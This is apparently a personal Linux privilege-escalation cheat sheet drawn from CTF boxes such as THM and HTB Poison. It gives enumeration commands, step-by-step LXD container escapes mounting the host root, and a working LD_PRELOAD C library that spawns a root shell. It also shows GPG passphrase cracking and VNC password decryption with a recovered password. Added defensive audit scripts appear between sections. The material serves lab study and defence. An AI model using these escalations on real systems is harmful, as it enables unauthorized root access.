Linux

I LOVE DOING THIS :)

  • Check the sudo permissions of the current user with sudo -l

  • Check /etc/os-release* and the groups the user belongs to with the id command - Also check the environment with env

cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
arch
ldd --version
grep -Hs iptables /etc/*        # Firewall Enumeration
lsmod
/sbin/modinfo <mod name>        # Kernel Modules

File Owners and Permissions

ls -la
find . -ls
history
cat ~/.bash_history
find / -type f -user <username> -readable 2> /dev/null # Readable files for user
find / -writable -type d 2>/dev/null # Writable directories for the user
find /usr/local/ -type d -writable   # Writable directories under /usr/local

Cron Jobs

ls -lah /etc/cron*
cat /etc/crontab
ls -la /var/log/cron*
find / -name cronlog 2>/dev/null
grep "CRON" /var/log/cron.log
grep CRON /var/log/syslog
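The cron checks above matter because a scheduled job whose script is writable by an unprivileged user is a classic misconfiguration. The helper below is an added example (not from the original notes): it parses a system-format crontab (the /etc/crontab layout: five time fields, user, command, or @reboot-style lines), extracts the program of each job, and reports the ones whose file is group- or world-writable. It reads whatever crontab file it is given, so it can be pointed at a backup or a copy; the helper names and the sample crontab in the test are constructed for this example.

```shell
#!/bin/sh
# Added example: audit a system-format crontab for jobs whose program file
# is writable by group or others. Helper names are hypothetical.

# Print the program path of every job line in a crontab file.
# Comments, blank lines and variable assignments (SHELL=, PATH=, MAILTO=) are skipped.
cron_job_programs() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }                 # comments, blank lines
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }         # NAME=value lines
        $1 ~ /^@/ { print $3; next }                      # @reboot user command
        NF >= 7   { print $7 }                            # m h dom mon dow user command
    ' "$1"
}

# Report jobs whose program is writable by group or others.
# Findings go to stderr; the number of findings is printed on stdout.
find_writable_cron_targets() {
    crontab_file=$1
    count=0
    for prog in $(cron_job_programs "$crontab_file"); do
        [ -f "$prog" ] || continue
        # Portable permission check: columns 6 and 9 of "ls -l" are the
        # group-write and other-write bits.
        perms=$(ls -ld "$prog" | cut -c1-10)
        case $perms in
            ?????w????|????????w?)
                echo "writable cron target: $prog" >&2
                count=$((count + 1))
                ;;
        esac
    done
    echo "$count"
}

# Usage: sh cron_audit.sh /etc/crontab
[ $# -eq 0 ] || find_writable_cron_targets "$1"
```

A non-zero count is the signal: the fix is to make the script root-owned with mode 755 (or tighter), not to remove the job.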

Internally running ports

netstat -alnp | grep LIST | grep <port_num>
netstat -antp
netstat -tulnp
# curl the listening ports

Interesting directories to check with ls -la

/dev 
/scripts 
/opt 
/mnt 
/var/www/html 
/var/www/html/wordpress 
/var 
/etc 
/media
/backup

SUID Binaries - GTFObins

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
find / -type f -name <file name> 2>/dev/null
ldd /usr/bin/binary-name
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"
ltrace /usr/sbin/binary-name
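The find commands above list SUID/SGID files once; from the defender's side what matters is a SUID binary that was not there yesterday. The script below is an added example (not from the original notes or GTFOBins): it records a baseline of SUID/SGID files under a tree and, on later runs, prints only the files that appeared since. The function names are hypothetical and the directory tree and files in the test are constructed.

```shell
#!/bin/sh
# Added example: baseline-and-diff for SUID/SGID files. Helper names are
# hypothetical; point the functions at "/" for a real host.

# List SUID or SGID regular files under $1, sorted so the output can be diffed.
# -perm -4000 = setuid bit, -perm -2000 = setgid bit.
list_suid_sgid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Save the current listing for tree $1 into baseline file $2.
# Run this once from a known-good state.
record_suid_baseline() {
    list_suid_sgid "$1" > "$2"
}

# Print files that are SUID/SGID now but absent from baseline $2.
# Empty output means nothing new; anything printed deserves a look.
new_suid_since_baseline() {
    tree=$1; baseline=$2
    # comm -13: keep only lines present in the second input (the current listing)
    list_suid_sgid "$tree" | comm -13 "$baseline" -
}

# Usage: sh suid_audit.sh record /  /var/lib/suid.baseline
#        sh suid_audit.sh check  /  /var/lib/suid.baseline
case ${1:-} in
    record) record_suid_baseline "$2" "$3" ;;
    check)  new_suid_since_baseline "$2" "$3" ;;
esac
```

Schedule the check from cron and alert on non-empty output; package upgrades will legitimately change the list, so refresh the baseline after them.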

LXD Privilege Escalation

  • When you find you are a member of the lxd group, then !

# Steps to be performed on the attacker machine:

Download build-alpine to your local machine from the git repository.
Execute the "build-alpine" script; it builds the latest Alpine image as a compressed tar file. This step must be run as root.
Transfer the tar file to the victim machine.
  • git clone https://github.com/saghul/lxd-alpine-builder.git

  • cd lxd-alpine-builder

  • bash build-alpine

# Steps to be performed on the victim machine:

Download the alpine image
Import image for lxd 
Initialize the image inside a new container.
Mount the container inside the /root directory
  • lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage

  • lxc image list

  • lxc init myimage ignite -c security.privileged=true

This initializes a new container named "ignite" from the image "myimage", with the configuration option "security.privileged" set to "true"

A privileged container is not confined in the usual way, so it can reach host resources that would otherwise be restricted

  • lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

This adds a new device called "mydevice" to the container "ignite"

The device is of type disk, with "/" (the root of the host file system) as its source, mounted at "/mnt/root" inside the container's file system

The "recursive=true" option mounts the source recursively, so mounts nested below "/" on the host are included as well

  • lxc start ignite

  • lxc exec ignite /bin/sh - We get R00t :)

Found a .git directory ?

  • Dump the commit history

  • Check the logs for any passwords

  • Refer to the Git Happens THM box :)

Pretty Good Privacy (PGP) ?

  • Found any credentials or a file with the .pgp extension? Try decrypting it with gpg

  • If that fails, look for an .asc key file and import it with the gpg command

$ gpg --decrypt credentials.pgp
FAILED
$ gpg --import tryhackme.asc 
passphrase : 

The passphrase prompt confirms that the key in the .asc file is protected by a passphrase

  • Crack the passphrase with gpg2john and john, import the key again and decrypt the file with the recovered passphrase

LD Preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>     /* setuid/setgid */

/* Runs when the library is loaded; with -nostartfiles there is no default _init */
void _init()
{
 unsetenv("LD_PRELOAD"); /* otherwise every child process preloads this library again */
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

Important => Unset the env variable "LD_PRELOAD" first, otherwise every process spawned (including the shell) loads the library again and it loops endlessly

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
$ sudo LD_PRELOAD=/home/user/shell.so /usr/bin/sky_backup_utility
# whoami
root
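Both the LXD section and the LD_PRELOAD section above depend on a configuration detail that an administrator can check for: sudo strips LD_PRELOAD by default, so the run on the sky_backup_utility line only works when a Defaults line in sudoers adds LD_PRELOAD to env_keep; and membership of the lxd group (docker is the same story) is effectively root access and should be reviewed like sudo rights. The two functions below are an added example (not from the original notes): one greps a sudoers file for Defaults lines that keep loader variables or disable env_reset, the other lists members of the lxd and docker groups from a group(5)-format file. Both take file paths so they can run against copies; the helper names are hypothetical and the sudoers and group files in the test are constructed samples.

```shell
#!/bin/sh
# Added example: two config checks for the preconditions of the LD_PRELOAD
# and LXD escalations. Helper names are hypothetical.

# Print sudoers Defaults lines that preserve LD_PRELOAD / LD_LIBRARY_PATH
# via env_keep, or that disable env_reset (which weakens sudo's environment
# sanitising in general). Included files (@include / #include) are not
# followed; pass each file explicitly. Prints nothing when the file is clean.
sudoers_env_findings() {
    grep -E '^[ \t]*Defaults' "$1" 2>/dev/null \
      | grep -E 'env_keep.*(LD_PRELOAD|LD_LIBRARY_PATH)|!env_reset' \
      || true
}

# Print "group:member" for every member of the lxd and docker groups in a
# group(5)-format file (name:password:gid:member,member,...).
privileged_group_members() {
    awk -F: '$1 == "lxd" || $1 == "docker" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print $1 ":" m[i]
    }' "$1"
}

# Usage: sh privesc_config_audit.sh /etc/sudoers /etc/group
if [ $# -eq 2 ]; then
    echo "== sudoers findings =="; sudoers_env_findings "$1"
    echo "== lxd/docker members =="; privileged_group_members "$2"
fi
```

Use visudo rather than editing sudoers directly when removing an env_keep entry; a syntax error there locks everyone out of sudo.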

VNC process being run as ROOT

charix@Poison:~ % ps -auxww | grep vnc
root    529   0.0  0.7  23620 7432 v0- I    Fri23      0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

VNC is remote access software, like TeamViewer or AnyDesk - The -rfbport flag shows that it is listening on port 5901 on localhost - We can verify that with the netstat command

charix@Poison:~ % netstat -an | grep LIST
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

After some port forwarding !

vncviewer 127.0.0.1:5000
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password:

When a VNC password is set, it is obfuscated and saved as a file on the server. Instead of typing the password, the obfuscated password file can be supplied with the passwd option

$ python vncpasswd.py -d -f ../../htb/poison/secret
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'VNCP@$$!'
Decrypted Hex Pass= '564e435040242421'
